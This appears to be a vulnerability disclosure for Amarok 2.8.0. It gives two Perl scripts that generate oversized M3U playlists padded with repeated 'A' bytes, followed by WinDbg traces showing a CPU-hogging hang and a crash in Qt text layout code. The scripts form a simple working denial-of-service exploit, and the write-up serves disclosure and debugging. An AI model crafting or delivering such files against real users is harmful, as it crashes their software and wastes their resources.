Description
A remote user can create a specially crafted M3U file, media playlist file that when loaded by the target user, will trigger a memory leak, whereby Amarok 2.8.0 continue to waste resources over time, eventually consuming all resources.
Impact
Attacker might be able to launch a DOS (denial of service) attack by crashing the application or take advantage of other unexpected program behavior resulting from a low resources.
Steps Followed
- Craft M3U media playlist file, using perl script:
my $file= “test_big.m3u“;
my $junk= “\x41” x 6368545;
open($FILE,”>$file”);
print $FILE “$junk”;
close($FILE);
print “m3u File Created successfully\n”;
- Open Amarok -> Play Media, and select crafted m3u file, test_big.m3u.
- Application start hogging processor to 100%.

- PID is attached to WinDbg.

- Identified thread causing problem and make the thread causing problem current thread.
0:012> !runaway 3 User Mode Time Thread Time 0:a34 0 days 0:37:12.265 8:b38 0 days 0:00:01.578 7:710 0 days 0:00:01.187 5:d40 0 days 0:00:00.734 2:ee0 0 days 0:00:00.125 10:af8 0 days 0:00:00.078 18:b9c 0 days 0:00:00.031 22:1430 0 days 0:00:00.000 20:1344 0 days 0:00:00.000 17:374 0 days 0:00:00.000 13:3e4 0 days 0:00:00.000 12:1304 0 days 0:00:00.000 11:16a4 0 days 0:00:00.000 9:3d4 0 days 0:00:00.000 6:778 0 days 0:00:00.000 4:aa8 0 days 0:00:00.000 3:ad4 0 days 0:00:00.000 1:ca4 0 days 0:00:00.000 Kernel Mode Time Thread Time 0:a34 0 days 0:01:25.328 8:b38 0 days 0:00:00.250 10:af8 0 days 0:00:00.125 9:3d4 0 days 0:00:00.078 18:b9c 0 days 0:00:00.031 22:1430 0 days 0:00:00.015 13:3e4 0 days 0:00:00.015 7:710 0 days 0:00:00.015 5:d40 0 days 0:00:00.015 2:ee0 0 days 0:00:00.015 20:1344 0 days 0:00:00.000 17:374 0 days 0:00:00.000 12:1304 0 days 0:00:00.000 11:16a4 0 days 0:00:00.000 6:778 0 days 0:00:00.000 4:aa8 0 days 0:00:00.000 3:ad4 0 days 0:00:00.000 1:ca4 0 days 0:00:00.000 0:012> g (b84.398): Break instruction exception - code 80000003 (first chance) eax=7ff4e000 ebx=00000000 ecx=00000000 edx=7760f125 esi=00000000 edi=00000000 eip=775a40f0 esp=0c30ff5c ebp=0c30ff88 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246 ntdll!DbgBreakPoint: 775a40f0 cc int 3 0:014> !runaway 3 User Mode Time Thread Time 0:a34 0 days 0:50:29.000 8:b38 0 days 0:00:01.578 7:710 0 days 0:00:01.187 5:d40 0 days 0:00:00.734 2:ee0 0 days 0:00:00.125 10:af8 0 days 0:00:00.078 18:b9c 0 days 0:00:00.031 22:1430 0 days 0:00:00.000 20:1344 0 days 0:00:00.000 17:374 0 days 0:00:00.000 14:398 0 days 0:00:00.000 13:3e4 0 days 0:00:00.000 12:df8 0 days 0:00:00.000 11:16a4 0 days 0:00:00.000 9:3d4 0 days 0:00:00.000 6:778 0 days 0:00:00.000 4:aa8 0 days 0:00:00.000 3:ad4 0 days 0:00:00.000 1:ca4 0 days 0:00:00.000 Kernel Mode Time Thread Time 0:a34 0 days 0:01:45.625 8:b38 0 days 0:00:00.250 10:af8 0 days 0:00:00.140 9:3d4 0 days 0:00:00.078 18:b9c 0 days 0:00:00.031 22:1430 0 days 0:00:00.015 13:3e4 0 days 0:00:00.015 7:710 0 days 0:00:00.015 5:d40 0 days 0:00:00.015 2:ee0 0 days 0:00:00.015 20:1344 0 days 0:00:00.000 17:374 0 days 0:00:00.000 14:398 0 days 0:00:00.000 12:df8 0 days 0:00:00.000 11:16a4 0 days 0:00:00.000 6:778 0 days 0:00:00.000 4:aa8 0 days 0:00:00.000 3:ad4 0 days 0:00:00.000 1:ca4 0 days 0:00:00.000 0:014> ~ 0 Id: b84.a34 Suspend: 1 Teb: 7ffdf000 Unfrozen 1 Id: b84.ca4 Suspend: 1 Teb: 7ffde000 Unfrozen 2 Id: b84.ee0 Suspend: 1 Teb: 7ffdd000 Unfrozen 3 Id: b84.ad4 Suspend: 1 Teb: 7ffdc000 Unfrozen 4 Id: b84.aa8 Suspend: 1 Teb: 7ffdb000 Unfrozen 5 Id: b84.d40 Suspend: 1 Teb: 7ffd9000 Unfrozen 6 Id: b84.778 Suspend: 1 Teb: 7ffd7000 Unfrozen 7 Id: b84.710 Suspend: 1 Teb: 7ffd6000 Unfrozen 8 Id: b84.b38 Suspend: 1 Teb: 7ffd5000 Unfrozen 9 Id: b84.3d4 Suspend: 1 Teb: 7ffd4000 Unfrozen 10 Id: b84.af8 Suspend: 1 Teb: 7ffd3000 Unfrozen 11 Id: b84.16a4 Suspend: 1 Teb: 7ff4f000 Unfrozen 12 Id: b84.df8 Suspend: 1 Teb: 7ffd8000 Unfrozen 13 Id: b84.3e4 Suspend: 1 Teb: 7ff4d000 Unfrozen . 14 Id: b84.398 Suspend: 1 Teb: 7ff4e000 Unfrozen 17 Id: b84.374 Suspend: 1 Teb: 7ff48000 Unfrozen 18 Id: b84.b9c Suspend: 1 Teb: 7ff47000 Unfrozen 20 Id: b84.1344 Suspend: 1 Teb: 7ff4a000 Unfrozen 22 Id: b84.1430 Suspend: 1 Teb: 7ff45000 Unfrozen 0:014> ~0s *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\Amarok\bin\QtCore4.dll - eax=00000002 ebx=0f40d4b0 ecx=00000000 edx=00000002 esi=002269b8 edi=00226a00 eip=6a24b5d3 esp=002266b0 ebp=002266d8 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246 QtCore4!Z17qt_localeFromLCIDm+0x2964: 6a24b5d3 0fb755e4 movzx edx,word ptr [ebp-1Ch] ss:0023:002266bc=0000
- Stack Backtrace
0:000> kb ChildEBP RetAddr Args to Child WARNING: Stack unwind information not available. Following frames may be wrong. 002266d8 6a24d748 0f2c4bc0 0f4108cc 00000000 QtCore4!Z17qt_localeFromLCIDm+0x2964 00226738 6a254bcd 0af21520 0ade9508 0ad96020 QtCore4!Z17qt_localeFromLCIDm+0x4ad9 00226788 6a254ecb 0af21520 00000001 0ad96020 QtCore4!Z17qt_localeFromLCIDm+0xbf5e 002267d8 6a25528f 0af21520 00000001 0ad96020 QtCore4!Z17qt_localeFromLCIDm+0xc25c 00226828 6a267a7e 0af21520 0ad96020 00000000 QtCore4!Z17qt_localeFromLCIDm+0xc620 00226868 6a266a7b 002269b8 00000000 0022690c QtCore4!Z17qt_localeFromLCIDm+0x1ee0f 00226898 6a26817b 002269b8 00ede3b0 010e465a QtCore4!Z17qt_localeFromLCIDm+0x1de0c 002268c8 6a26f9bf 002269b8 01088e45 0022780c QtCore4!Z17qt_localeFromLCIDm+0x1f50c *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\Amarok\bin\QtGui4.dll - 002268e8 009ac901 002269b8 00000000 ffffffff QtCore4!Z10qShapeItemP14HB_ShaperItem_+0x11 002271f8 009ab769 0000020a 00000000 00227258 QtGui4!ZNK11QTextEngine21shapeTextWithHarfbuzzEi+0xc6d 002272d8 009ad74e 0000020a 00227314 00227304 QtGui4!ZNK11QTextEngine9shapeTextEi+0xa3 00227368 009bbd26 0000020a 00227490 0022740c QtGui4!ZNK11QTextEngine5shapeEi+0x268 00227568 009bb345 7fffffff 00000000 00227668 QtGui4!ZN9QTextLine13layout_helperEi+0x2b0 00227598 009b833f 7fffffff 00227780 00227610 QtGui4!ZN9QTextLine13setNumColumnsEi+0x71 00227668 00e2b7ea 00000001 00000000 00227708 QtGui4!ZN11QTextLayout10createLineEv+0xf3 00227728 00e2c40a 0022a060 0022a050 00000001 QtGui4!ZNK17QGraphicsTextItem10textCursorEv+0xb8 0022a0e8 00e53426 0022b90c 090aff58 0933e000 QtGui4!ZN23QGraphicsSimpleTextItem5paintEP8QPainterPK24QStyleOptionGraphicsItemP7QWidget+0x18a 0022a1e8 00e52c60 09307ec0 0022b90c 00000000 QtGui4!ZN14QGraphicsScene14drawForegroundEP8QPainterRK6QRectF+0x469c 0022a528 00e5379b 09307ec0 0022b90c 00000000 QtGui4!ZN14QGraphicsScene14drawForegroundEP8QPainterRK6QRectF+0x3ed6 0022a628 00e52c60 09404df8 0022b90c 00000000 QtGui4!ZN14QGraphicsScene14drawForegroundEP8QPainterRK6QRectF+0x4a11 0022a968 00e5379b 09404df8 0022b90c 00000000 QtGui4!ZN14QGraphicsScene14drawForegroundEP8QPainterRK6QRectF+0x3ed6 0022aa68 00e52c60 06314e78 0022b90c 00000000 QtGui4!ZN14QGraphicsScene14drawForegroundEP8QPainterRK6QRectF+0x4a11 0022ada8 00e5379b 06314e78 0022b90c 00000000 QtGui4!ZN14QGraphicsScene14drawForegroundEP8QPainterRK6QRectF+0x3ed6 0022aea8 00e52c60 090a9068 0022b90c 00000000 QtGui4!ZN14QGraphicsScene14drawForegroundEP8QPainterRK6QRectF+0x4a11 0022b1e8 00e5379b 090a9068 0022b90c 00000000 QtGui4!ZN14QGraphicsScene14drawForegroundEP8QPainterRK6QRectF+0x3ed6 0022b2e8 00e52c60 060a65a8 0022b90c 00000000 QtGui4!ZN14QGraphicsScene14drawForegroundEP8QPainterRK6QRectF+0x4a11 0022b628 00e520ca 060a65a8 0022b90c 00000000 QtGui4!ZN14QGraphicsScene14drawForegroundEP8QPainterRK6QRectF+0x3ed6 0022b798 00e76445 0022b90c 00000000 061260b0 QtGui4!ZN14QGraphicsScene14drawForegroundEP8QPainterRK6QRectF+0x3340 0022bb58 0079820f 0022c408 6a370000 0022bbb8 QtGui4!ZN13QGraphicsView10paintEventEP11QPaintEvent+0xb6b 0022bd48 00be9562 0022c408 00000000 feedbab1 QtGui4!ZN7QWidget5eventEP6QEvent+0xaff 0022bd78 00c9b3bc 0022c408 0022bdb8 0022bdb8 QtGui4!ZN6QFrame5eventEP6QEvent+0x3c 0022bd98 00e72c67 0022c408 00000000 0022bdf8 QtGui4!ZN19QAbstractScrollArea13viewportEventEP6QEvent+0x76 0022be68 00f94b24 0022c408 0933e004 0022be88 QtGui4!ZN13QGraphicsView13viewportEventEP6QEvent+0x8ad 0022be88 00f929d5 0022c408 00000000 09317da8 QtGui4!ZN26QAbstractScrollAreaPrivate13viewportEventEP6QEvent+0x28 0022bea8 6a2ff68e 0933e000 0022c408 0022bed8 QtGui4!ZN24QStyleOptionGraphicsItemC1ERKS_+0x10f5 0022bed8 00743352 0933e000 0022c408 0022bf08 QtCore4!ZN23QCoreApplicationPrivate29sendThroughObjectEventFiltersEP7QObjectP6QEvent+0x9e 0022bf08 00742f05 0933e000 0022c408 0022bf38 QtGui4!ZN19QApplicationPrivate13notify_helperEP7QObjectP6QEvent+0x140 0022c2e8 6a2ff40f 0933e000 0022c408 00000048 QtGui4!ZN12QApplication6notifyEP7QObjectP6QEvent+0x2c59 0022c378 00f4ccb1 0933e000 0022c408 00000048 QtCore4!ZN16QCoreApplication14notifyInternalEP7QObjectP6QEvent+0xc1 0022c398 0078e8d8 0933e000 0022c408 00000000 QtGui4!ZN16QAccessibleEvent8setValueERK7QString+0x711 0022c518 0078fbde 0af99dd0 0022c5a8 0022c5f4 QtGui4!ZN14QWidgetPrivate10drawWidgetEP12QPaintDeviceRK7QRegionRK6QPointiP8QPainterP19QWidgetBackingStore+0x8e2 0022c628 0078ed85 0af99dd0 06125d6c 00000001 QtGui4!ZN14QWidgetPrivate22paintSiblingsRecursiveEP12QPaintDeviceRK5QListIP7QObjectEiRK7QRegionRK6QPointiP8QPainterP19QWidgetBackingStore+0x4e0 0022c7a8 0078fbde 0af99dd0 0022c838 0022c884 QtGui4!ZN14QWidgetPrivate10drawWidgetEP12QPaintDeviceRK7QRegionRK6QPointiP8QPainterP19QWidgetBackingStore+0xd8f 0022c8b8 0078ed85 0af99dd0 09311e94 00000000 QtGui4!ZN14QWidgetPrivate22paintSiblingsRecursiveEP12QPaintDeviceRK5QListIP7QObjectEiRK7QRegionRK6QPointiP8QPainterP19QWidgetBackingStore+0x4e0 0022ca38 0078fbde 0af99dd0 0022cac8 0022cb14 QtGui4!ZN14QWidgetPrivate10drawWidgetEP12QPaintDeviceRK7QRegionRK6QPointiP8QPainterP19QWidgetBackingStore+0xd8f 0022cb48 0078ed85 0af99dd0 09311d3c 00000005 QtGui4!ZN14QWidgetPrivate22paintSiblingsRecursiveEP12QPaintDeviceRK5QListIP7QObjectEiRK7QRegionRK6QPointiP8QPainterP19QWidgetBackingStore+0x4e0 0022ccc8 0078fbde 0af99dd0 0022cd58 0022cda4 QtGui4!ZN14QWidgetPrivate10drawWidgetEP12QPaintDeviceRK7QRegionRK6QPointiP8QPainterP19QWidgetBackingStore+0xd8f 0022cdd8 0078fa66 0af99dd0 05fa307c 00000045 QtGui4!ZN14QWidgetPrivate22paintSiblingsRecursiveEP12QPaintDeviceRK5QListIP7QObjectEiRK7QRegionRK6QPointiP8QPainterP19QWidgetBackingStore+0x4e0 0022cee8 0078ed85 0af99dd0 05fa307c 00000046 QtGui4!ZN14QWidgetPrivate22paintSiblingsRecursiveEP12QPaintDeviceRK5QListIP7QObjectEiRK7QRegionRK6QPointiP8QPainterP19QWidgetBackingStore+0x368 0022d068 0096aa6a 0af99dd0 0022d17c 0022d174 QtGui4!ZN14QWidgetPrivate10drawWidgetEP12QPaintDeviceRK7QRegionRK6QPointiP8QPainterP19QWidgetBackingStore+0xd8f 0022d2b8 00783991 0022d2d8 00000000 feedbab1 QtGui4!ZN14QWidgetPrivate10scrollRectERK5QRectii+0x1a6e 0022d338 007988db 0022d368 00000000 0022d4a8 QtGui4!ZN14QWidgetPrivate16syncBackingStoreEv+0xc7 0022d528 00c1105e 0a3a9580 00000000 0933e9e0 QtGui4!ZN7QWidget5eventEP6QEvent+0x11cb 0022d5e8 00743375 0a3a9580 0a3a9580 0022d618 QtGui4!ZN11QMainWindow5eventEP6QEvent+0x57a 0022d618 00742f05 05fb06f8 0a3a9580 0916ce78 QtGui4!ZN19QApplicationPrivate13notify_helperEP7QObjectP6QEvent+0x163 0022d9f8 6a2ff40f 05fb06f8 0a3a9580 6a417bb7 QtGui4!ZN12QApplication6notifyEP7QObjectP6QEvent+0x2c59 0022da88 6a38a4f3 05fb06f8 0a3a9580 04e5255c QtCore4!ZN16QCoreApplication14notifyInternalEP7QObjectP6QEvent+0xc1 0022daa8 6a3005f9 05fb06f8 0a3a9580 0022db08 QtCore4!ZN16QCoreApplication9sendEventEP7QObjectP6QEvent+0x3b 0022db58 6a32b452 00000000 00000000 04e52540 QtCore4!ZN23QCoreApplicationPrivate16sendPostedEventsEP7QObjectiP11QThreadData+0x37d 0022dc28 75bcc4e7 00000006 0022dcc4 75bcc4e7 QtCore4!Z13winGetMessageP6tagMSGP6HWND__jj+0x42a 0022dc60 75bcc5e7 6a32b144 00040216 00000401 USER32!InternalCallWinProc+0x23 0022dcd8 75bccc19 00000000 6a32b144 00040216 USER32!UserCallWinProcCheckWow+0x14b 0022dd38 75bccc70 6a32b144 00000000 0022fb88 USER32!DispatchMessageWorker+0x35e 0022dd48 6a32cc8c 0022fb14 00000002 00000000 USER32!DispatchMessageW+0xf 0022fb88 007b3880 00000000 0022fbfc 0022fe68 QtCore4!ZN21QEventDispatcherWin3213processEventsE6QFlagsIN10QEventLoop17ProcessEventsFlagEE+0x6e8 0022fc18 6a2fd2a1 0022fc78 00000010 6a387454 QtGui4!Z24qt_getRegisteredWndClassv+0x513 0022fc98 6a2fd48a 0022fcf8 00000020 0022fd10 QtCore4!ZN10QEventLoop13processEventsE6QFlagsINS_17ProcessEventsFlagEE+0xed 0022fd28 6a2ffb7e 0022fd94 0022fcf0 0022fd68 QtCore4!ZN10QEventLoop4execE6QFlagsINS_17ProcessEventsFlagEE+0x1b2 0022fdb8 007402aa 0022fe7c 0040f7ee 0022ffc4 QtCore4!ZN16QCoreApplication4execEv+0x160 *** ERROR: Module load completed but symbols could not be loaded for C:\Program Files\Amarok\bin\amarok.exe 0022fdd8 0040ceb7 0000000f 6a2ffc80 0022fe50 QtGui4!ZN12QApplication4execEv+0x1a 0022feb8 004013ee 04e8fe20 00000027 00000001 amarok+0xceb7 0022ff88 774e3c45 7ffda000 0022ffd4 775d37f5 amarok+0x13ee 0022ff94 775d37f5 7ffda000 77430b78 00000000 kernel32!BaseThreadInitThunk+0xe 0022ffd4 775d37c8 004014e0 7ffda000 00000000 ntdll!__RtlUserThreadStart+0x70 0022ffec 00000000 004014e0 7ffda000 00000000 ntdll!_RtlUserThreadStart+0x1b 0:000> g QtCore4!Z17qt_localeFromLCIDm+0x4ad9 eax=00000000 ebx=0f40d4b0 ecx=00000000 edx=00000000 esi=002269b8 edi=00226a00 eip=6a24d748 esp=002266e0 ebp=00226738 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246 QtCore4!Z17qt_localeFromLCIDm+0x4ad9: 6a24d748 8945dc mov dword ptr [ebp-24h],eax ss:0023:00226714=0000ffff 0:000>
- Identified the offending function
0022a968 00e5379b 09307e60 0022b90c 00000000 QtGui4!ZN14QGraphicsScene14drawForegroundEP8QPainterRK6QRectF+0x3ed6
- Now Craft Big M3U media playlist file, using perl script:
my $file= “DoS.m3u“;
my $junk= “\x41” x 31842721;
open($FILE,”>$file”);
print $FILE “$junk”;
close($FILE);
print “m3u File Created successfully\n”;
- Open Amarok -> Play Media, and select crafted m3u file, DoS.m3u

- Crashes the Amarok

